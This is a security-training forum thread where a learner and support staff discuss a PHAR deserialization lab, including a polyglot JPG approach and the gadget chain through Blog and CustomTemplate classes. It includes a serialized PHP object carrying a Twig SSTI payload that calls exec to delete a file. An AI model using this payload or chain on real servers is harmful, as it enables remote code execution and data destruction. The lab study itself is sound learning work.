Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Login to post

Why Do I need the CustomTemplate class to solve PHAR deserialization lab?

Guillaume | Last updated: Nov 13, 2023 04:23PM UTC

To solve the lab, I need to upload a polyglot JPG with a malicious code inside. To do this, I used this tool: https://github.com/kunte0/phar-jpg-polyglot Then, until the phar jpg file is uploaded on the server, I need to call it through the phar:// stream. It is trivial to find the good path. NB: If I add a %00 on the path, the server returns an error and indicates the usage of file_exists so if my understanding is good, it means all deserialized objects inside the jpg file will be deserialized. Then, it is possible to download source code inside cgi-bin folder. I see that the class Blog has the magic method wake_up with a SSTI vulnerability inside. So, if I serialized the following code inside my JPG file thanks to the phar-jpg-polyglot project: class Blog {} $object = new Blog(); $object->user = 'carlos'; $object->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}'; It is supposed to work, no? But it is not the case and I need to use the class CustomTemplate and I don't understand why.

Michelle, PortSwigger Agent | Last updated: Nov 14, 2023 10:33AM UTC

Hi Have you tried following along with the Community solution video? This goes into a bit more detail on the steps, so might help you piece together the bits of information and understand why certain steps are needed.

Guillaume | Last updated: Nov 14, 2023 07:28PM UTC

Yes I read the solution and saw the related videos and I don't understand the explanation concerning the usage of the class CustomTemplate. I don't understand why I cannot use the Blob class alone. With the __wake method if I serialized a Blob object inside the JPG phar files if I use the stream phar:// on the image because the avatar webpage uses file_exists, the Blob object should be deserialized and the SSTI executed but it is not the case.

Michelle, PortSwigger Agent | Last updated: Nov 15, 2023 03:39PM UTC

Hi Thanks for the update. We'll have a chat with the team and get back to you shortly.

Michelle, PortSwigger Agent | Last updated: Nov 17, 2023 01:36PM UTC

Hi I've had a quick look at this lab with the team. In step 2, "In Burp Repeater, request GET /cgi-bin to find an index that shows a Blog.php and CustomTemplate.php file. Obtain the source code by requesting the files using the .php~ backup extension", we find that the files referenced and so the classes declared within them already exist and are referenced on the server. Using this information you can infer how the blog is set up and look into swapping out some of the classes with your own. There are a few other labs, such as 'Arbitrary object injection in PHP' (https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-arbitrary-object-injection-in-php) that also use a similar setup, so if you've not already worked through the other labs this may help deepen your understanding.

Guillaume | Last updated: Nov 17, 2023 03:42PM UTC

I downloaded the source code and I don't have any problem with this. My problem is I don't understand why I need the CustomTemplate object to initiate the chain gadget. If I serialized the following code inside my JPG file thanks to the phar-jpg-polyglot project: class Blog {} $object = new Blog(); $object->user = 'carlos'; $object->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}'; It is supposed to work, no? But it is not the case and I need to use the class CustomTemplate and I don't understand why.

Michelle, PortSwigger Agent | Last updated: Nov 20, 2023 10:25AM UTC

Hi I’m afraid we can’t provide dedicated mentoring for individual labs. This is one of the expert-level labs, so it is designed to require more investigation to find the solution. Web applications work in arbitrary ways, and with this lab, we're trying to provide more challenges around working out what's happening within the application and why to then in turn figure out how they can be exploited.

Guillaume | Last updated: Nov 20, 2023 10:04PM UTC

Thanks to the last post here: https://forum.portswigger.net/thread/lab-using-phar-deserialization-to-deploy-a-custom-gadget-chain-8153534f I think i understand how the chain gadget works My mistake is I thought that the wake_up function executed the SSTI payload but the SSTI vulnerability is located inside the __toString function. The wake_up function allows only to initialized the index for the render with twig. So, I presume that the payload works like this: 1) When the CustomTemplate $object is deserialized because it includes a Blog object, the __wakeup function is called and index == SSTI payload. 2) The, the $object will be destroyed and the function lockFilePath() will be called. 3) Inside the lockFilePath() function we have: return 'templates/' . $this->template_file_path . '.lock'; $this->template_file_path is a Blob object and here it is treated like a string so __toString will be called and the SSTI payload will be executed.

You need to Log in to post a reply. Or register here, for free.